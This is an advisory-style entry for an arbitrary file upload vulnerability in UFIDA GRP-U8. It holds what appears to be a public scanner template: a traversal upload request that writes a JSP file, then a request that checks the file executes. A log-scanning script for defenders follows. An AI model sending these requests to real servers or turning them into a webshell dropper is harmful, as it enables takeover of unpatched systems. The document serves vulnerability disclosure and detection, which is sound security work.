grp-u8-uploadfiledata: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload

Date: 2025-08-01 | Affected software: UFIDA GRP U8 UploadFileData | POC: Public

Vulnerability description

File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.

PoC code [public]

id: grp-u8-uploadfiledata

info:
  name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
  reference:
    - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
  metadata:
    verified: true
    max-request: 2
    fofa-query: title="用友GRP-U8行政事业内控管理软件"
  tags: yonyou,fileupload,grp,intrusive,vuln

http:
  - raw:
      - |
        POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 327
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
        Accept-Encoding: gzip

        ------WebKitFormBoundaryqoqnjtcw
        Content-Disposition: form-data; name="upload"; filename="emgeyr.jsp"
        Content-Type: application/octet-stream

        <% {out.print("{{randstr_2}}");} %>
        ------WebKitFormBoundaryqoqnjtcw
        Content-Disposition: form-data; name="submit"

        submit
        ------WebKitFormBoundaryqoqnjtcw--
      - |
        GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and
# digest: 4a0a00473045022100df4941a4345f819cf58ac7200d498635c7023c178c37c822531288e23c7b803e02202a80370b447413f3dfa812172cf5d9b8f8afd11e8805115d7c38203cab0bf1f9:922c64590222798bb761d5b6d8e72950
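
For defenders, the two requests in the template leave a recognizable pair in web access logs: a POST to /UploadFileData whose filename parameter traverses upward or ends in a script extension, followed by a GET for the same file name under /R9iPortal/. The following log scan is an added example, not part of the original template or of any UFIDA tooling; it assumes common/combined access-log format and case-insensitive paths, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0800] "POST /UploadFileData?action=upload_file&filename=../abc123.jsp HTTP/1.1" 200 512
10.0.0.5 - - [01/Aug/2025:10:00:02 +0800] "GET /R9iPortal/abc123.jsp HTTP/1.1" 200 27
10.0.0.9 - - [01/Aug/2025:10:05:00 +0800] "POST /UploadFileData?action=upload_file&filename=report.xls HTTP/1.1" 200 300
10.0.0.7 - - [01/Aug/2025:10:06:00 +0800] "POST /UploadFileData?action=upload_file&filename=%2e%2e%2Fzz.jsp HTTP/1.1" 200 300
10.0.0.8 - - [01/Aug/2025:10:07:00 +0800] "GET /R9iPortal/index.jsp HTTP/1.1" 200 9000
"""

# Assumed log layout: ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".jsp", ".jspx")


def scan(log_text):
    """Return (uploads, confirmed).

    uploads:   (ip, filename, status) for suspicious UploadFileData requests
    confirmed: (uploader_ip, path) where the uploaded name was later served
    """
    uploads, pending, confirmed = [], {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)
        if method == "POST" and path.lower() == "/uploadfiledata":
            # parse_qs percent-decodes values, so %2e%2e%2F is caught too
            for name in parse_qs(url.query).get("filename", []):
                norm = name.replace("\\", "/")
                if "../" in norm or norm.lower().endswith(SCRIPT_EXT):
                    uploads.append((ip, name, status))
                    pending[norm.rsplit("/", 1)[-1].lower()] = ip
        elif method == "GET" and status == "200":
            base = path.rsplit("/", 1)[-1].lower()
            if base in pending and path.lower().startswith("/r9iportal/"):
                confirmed.append((pending[base], path))
    return uploads, confirmed


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

An entry in `confirmed` means the uploaded file was written and served, so the host should be treated as compromised rather than merely probed.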
